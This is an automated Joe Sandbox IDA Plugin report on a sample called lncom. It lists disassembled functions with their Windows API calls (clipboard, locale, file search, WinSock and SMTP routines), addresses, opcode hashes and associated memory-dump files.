Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: InformationTimeZone
String ID: -%.2d%.2d$-0000
API String ID: 565725191-1757235468
Opcode ID: e2d6854c876e6bbcd86ac6ff9310c42906c928ed39fcd563a05f368d21471569
Instruction ID: 0a98d84408ccd7563fb015daf571e6cd58abfc593c4056654b762d8ac7a67895
Opcode Fuzzy Hash: e2d6854c876e6bbcd86ac6ff9310c42906c928ed39fcd563a05f368d21471569
Instruction Fuzzy Hash: CA112C70E04218DBDF50CBA9C845BCDB7F6AB85318F1082EAE518A7291D7385E44CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00487158 Relevance: 4.6, APIs: 3, Instructions: 67nativeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(005DAAA0), ref: 004871D5
RtlLeaveCriticalSection.NTDLL(005DAAA0), ref: 0048720E
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0048722F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CriticalSection$EnterLeaveNtdllProc_Window
String ID:
API String ID: 3778283700-0
Opcode ID: 885bbb0a274f8b824969f3dd58ecffcfab66a158c7833937b8139528015521f4
Instruction ID: b506455ae1b57d6303fbd64ac09ac7a6c52959e0464cd25dbfd4ced9d661169b
Opcode Fuzzy Hash: 885bbb0a274f8b824969f3dd58ecffcfab66a158c7833937b8139528015521f4
Instruction Fuzzy Hash: 3B11B671208204AF9710EF69DD5195BBBE9FB8C714B71896BF404C3B51D638DC10DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0045F618 Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32(0000000E), ref: 0045F625
CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 0045F647
GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000), ref: 0045F659

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileMeta$ClipboardCopyDataHeader
String ID:
API String ID: 1752724394-0
Opcode ID: ce3cbf6e0482f52d0987ad3ace51744a8a49d2134da8274892b734ffb89a04ca
Instruction ID: e4c49e2d10a3f8df40e6319b7da22e2fb081f9a3a6ffe760ee55738b4a8c6117
Opcode Fuzzy Hash: ce3cbf6e0482f52d0987ad3ace51744a8a49d2134da8274892b734ffb89a04ca
Instruction Fuzzy Hash: 671179326003058FC710DFAAC885A9ABBF8AF44310F10456EE908DB2A2DA74EC09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0049C254 Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,0000000B,0000000F,00000000,0000000B,?,00000001,?,0049C9E9,?,0000000E,0000000F,0000000B,00000001,?), ref: 0049C26A
SetLastError.KERNEL32(0000000E,?,0000000B,0000000F,00000000,0000000B,?,00000001,?,0049C9E9,?,0000000E,0000000F,0000000B,00000001,?), ref: 0049C283
GetLocaleInfoA.KERNEL32(?,0000000B,00000000,00000001,?,0000000B,0000000F,00000000,0000000B,?,00000001,?,0049C9E9,?,0000000E,0000000F), ref: 0049C296

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: a8d5ebddbcea4cb495bcc39869880c5f234b1a7062a522800ed564c34936278a
Instruction ID: b320fb01f5bac92e95ce793645de39c83e3520961e1eab053d0b87d7c3b9fed3
Opcode Fuzzy Hash: a8d5ebddbcea4cb495bcc39869880c5f234b1a7062a522800ed564c34936278a
Instruction Fuzzy Hash: B9F096722042157BDB009AE9CCC1FAB7BACDB8D754F10417BF508CB241DA74D80187B9

Uniqueness

Uniqueness Score: -1.00%

Function 0046CF24 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0046CF30
GetCursorPos.USER32(?), ref: 0046CF4D
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0046CF6D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: e41457da00430e061a68d78399b1871ec69a50aa1e79fa5821132d7c9bf9f9fe
Instruction ID: 9b2c1580e308e40aa267f8b563a8ddb030ddbdc9d48ccc7e09db6bf21148c1f0
Opcode Fuzzy Hash: e41457da00430e061a68d78399b1871ec69a50aa1e79fa5821132d7c9bf9f9fe
Instruction Fuzzy Hash: 44F0B4312042049BDB24E75AD8C6BE673ADAB08704F400167E5409B2D3FB789844D62F

Uniqueness

Uniqueness Score: -1.00%

Function 0043233C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

@Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00432359

Part of subcall function 0043163C: LoadLibraryA.KERNEL32(00000000,00000000,004317AE), ref: 00431679
Part of subcall function 0043163C: GetLastError.KERNEL32(00000000,00000000,004317AE), ref: 0043168C
Part of subcall function 0043163C: @Wsocket@WSocket_WSAStartup$qqrusr7WSAData.LNCOM(00000000,00000000,004317AE), ref: 004316CA

Strings

recv, xrefs: 00432354

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AnsiDataErrorLastLibraryLoadProc$qqrx17SocketSocket_Startup$qqrusr7StringSystem@
String ID: recv
API String ID: 3012088548-1507349165
Opcode ID: 3512acd128556076531841e38ef2da1ad2a7704ed35a28883933fbccee5446dd
Instruction ID: 3dd88c0a80a5ee747136d3cb26a04d2898c856666fb9bd60697085eb0b781f56
Opcode Fuzzy Hash: 3512acd128556076531841e38ef2da1ad2a7704ed35a28883933fbccee5446dd
Instruction Fuzzy Hash: 04F098B5D01208EFCB50DFE9D885A9EB7F8AB1C310F008567B928E3350D7745A409F55

Uniqueness

Uniqueness Score: -1.00%

Function 00432294 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

@Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 004322B1

Part of subcall function 0043163C: LoadLibraryA.KERNEL32(00000000,00000000,004317AE), ref: 00431679
Part of subcall function 0043163C: GetLastError.KERNEL32(00000000,00000000,004317AE), ref: 0043168C
Part of subcall function 0043163C: @Wsocket@WSocket_WSAStartup$qqrusr7WSAData.LNCOM(00000000,00000000,004317AE), ref: 004316CA

Strings

bind, xrefs: 004322AC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AnsiDataErrorLastLibraryLoadProc$qqrx17SocketSocket_Startup$qqrusr7StringSystem@
String ID: bind
API String ID: 3012088548-1187836755
Opcode ID: ae125e85d81c4e85a5babbe0dc931ffdfce414007f175bed4bb344da5f3491f2
Instruction ID: c038c36df2a8f19cd663eb117a3a897dbfd3b97b397add759265532328d5f964
Opcode Fuzzy Hash: ae125e85d81c4e85a5babbe0dc931ffdfce414007f175bed4bb344da5f3491f2
Instruction Fuzzy Hash: BFF0C9B4D05208AFCB60DFD9ED4569EB7F8AB1D312F0045ABF818E3350D7785A009B55

Uniqueness

Uniqueness Score: -1.00%

Function 004371E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@Listen$qqrv.LNCOM ref: 004371FE

Part of subcall function 00435208: @Wsocket@WSocket_WSASetLastError$qqri.LNCOM ref: 0043523B
Part of subcall function 00435208: @Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00435248

Strings

Listening is not supported thru socks server, xrefs: 00437206

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$CustomSocket@$AnsiError$qqr17Error$qqriLastListen$qqrvSocketSocket_StringSystem@
String ID: Listening is not supported thru socks server
API String ID: 3801449652-4155111357
Opcode ID: aa302bb51785ee61f4468bbfb2ce96ac7b9e61d061a0f83865118c21dfeccc4d
Instruction ID: a036f77b54b0302b48750c077487aaccadf4628a2c71073e50d28ff479a0554f
Opcode Fuzzy Hash: aa302bb51785ee61f4468bbfb2ce96ac7b9e61d061a0f83865118c21dfeccc4d
Instruction Fuzzy Hash: D0E0127190810CEFDB14DBD4E545A9F77F9DB48314F2010EAF00C97651DB35AE409B48

Uniqueness

Uniqueness Score: -1.00%

Function 0047ABBC Relevance: 3.1, APIs: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0047ABF4
GetCapture.USER32 ref: 0047ABFD

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: de2a35050610e8219aacb46a8ddaa0dc7c714259728593f526444a07c0502c6d
Instruction ID: a60c80c170ef459a732a1010bac0319272c374011efeabfdecbfeeaa66c6af7a
Opcode Fuzzy Hash: de2a35050610e8219aacb46a8ddaa0dc7c714259728593f526444a07c0502c6d
Instruction Fuzzy Hash: 1E119D31600209AF9B21DB59C9859EEB3F8AF44304B6484AAE509DB352DB38ED10975A

Uniqueness

Uniqueness Score: -1.00%

Function 0045CCB4 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045CD50,?,00000000), ref: 0045CCD4
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0045CD50,?,00000000), ref: 0045CCFA

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 0cef4f4658d40a957d884f3501db73d639d4570900d3ef0a5ac9107207245b21
Instruction ID: dc1635f9797ac84911eb3e6a86fa13180b18e76423eb696eeeee25b0111ebfd2
Opcode Fuzzy Hash: 0cef4f4658d40a957d884f3501db73d639d4570900d3ef0a5ac9107207245b21
Instruction Fuzzy Hash: 4D01D8706003085FD721EB61CCC2BEA77BC9708B05F5104BBBA44D2282DAB86D88895C

Uniqueness

Uniqueness Score: -1.00%

Function 0049C2B0 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E,?,00000001,?,0049CA3D,?,00000011,-00000009,00000003), ref: 0049C2C8
GetLocaleInfoA.KERNEL32(-00000009,00000011,00000000,0049CA3E,?,00000001,?,0049CA3D,?,00000011,-00000009,00000003), ref: 0049C2DB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ErrorInfoLastLocale
String ID:
API String ID: 3523121092-0
Opcode ID: e840dbddcf41817e31e2b8028f909e003c4daef67f28912844c2b52f5f80dd7a
Instruction ID: fcb646dbc195d36cacc8316c16e5d70a5c550fd8236b86336a38524c432d29a1
Opcode Fuzzy Hash: e840dbddcf41817e31e2b8028f909e003c4daef67f28912844c2b52f5f80dd7a
Instruction Fuzzy Hash: 4BF0B46224430527CE14AA7AACC29973B8C9F09364B10443FF909D6152DD69D840817D

Uniqueness

Uniqueness Score: -1.00%

Function 0048B584 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,0043A086,00000000,0043A0CE,?,?,0043D0E3), ref: 0048B59F
GetLastError.KERNEL32(00000000,?,?,?,?,0043A086,00000000,0043A0CE,?,?,0043D0E3), ref: 0048B5C4

Part of subcall function 0048B520: FileTimeToLocalFileTime.KERNEL32(?), ref: 0048B54D
Part of subcall function 0048B520: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0048B55C

Part of subcall function 0048B5F8: FindClose.KERNEL32(?,?,0048B5C2,00000000,?,?,?,?,0043A086,00000000,0043A0CE,?,?,0043D0E3), ref: 0048B604

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: 899c189f482b972ed4e2bc92ea75c0bc46f24f091b7abb0caff16f6456cdb0ce
Instruction ID: d5cfb591c7ff506d723bc573a2336f466f1f9b04ca1022159cf1e0c302d21ca7
Opcode Fuzzy Hash: 899c189f482b972ed4e2bc92ea75c0bc46f24f091b7abb0caff16f6456cdb0ce
Instruction Fuzzy Hash: 9AE030726015201B4715BA6E588159F55C999487693090A7BB814DB346DB28CD0683E8

Uniqueness

Uniqueness Score: -1.00%

Function 0044220C Relevance: 3.0, APIs: 2, Instructions: 32nativewindowCOMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage.LNCOM ref: 0044222A
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0044224F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Smtp$Client@CustomDone$qqrr17MessageMessages@NtdllProc_RequestSmtpprot@Window
String ID:
API String ID: 2395760289-0
Opcode ID: fdb3e4c7496d1abc185dbb22ea6bf6c3d13e398f4f3cd04cd15dc3f130cbe62e
Instruction ID: 2b081cb5009f78b543be7225d32e620d44c9d71662fae8187c73ac4c5a60c3ef
Opcode Fuzzy Hash: fdb3e4c7496d1abc185dbb22ea6bf6c3d13e398f4f3cd04cd15dc3f130cbe62e
Instruction Fuzzy Hash: C1F0CF75A04208AFDB00CB98C58598DBBF8FB08320F108196B948E7351D674EE818B04

Uniqueness

Uniqueness Score: -1.00%

Function 004410A4 Relevance: 1.7, Instructions: 1713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4592552dff396d21eee1fa9e5ee74c656e92f050c740a318514f7faafba4e17
Instruction ID: 5f2724544846e034bd74cbda95de60e919497f8870fe1ba5835a98e6e7ce1c36
Opcode Fuzzy Hash: b4592552dff396d21eee1fa9e5ee74c656e92f050c740a318514f7faafba4e17
Instruction Fuzzy Hash: 78B2DE6144E7C14FE7278B608EA96A27FB5BE13314B1E00DBC5C19B1B3E55C8986C36E

Uniqueness

Uniqueness Score: -1.00%

Function 0047047C Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004704E1

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 36dedf461c783ca32623211d79801e08576c6fc405eb2bb9d2191a6c75751e3d
Instruction ID: 4e1560a1acbede19644f11d2c3d6779967785de32a5962a95f90681d1cbd98b6
Opcode Fuzzy Hash: 36dedf461c783ca32623211d79801e08576c6fc405eb2bb9d2191a6c75751e3d
Instruction Fuzzy Hash: 17F06276605214FF9B10DFAAD981C9AB7ECEB4932031180A6FA08D7201D279AD009B74

Uniqueness

Uniqueness Score: -1.00%

Function 0045D244 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0045D254

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
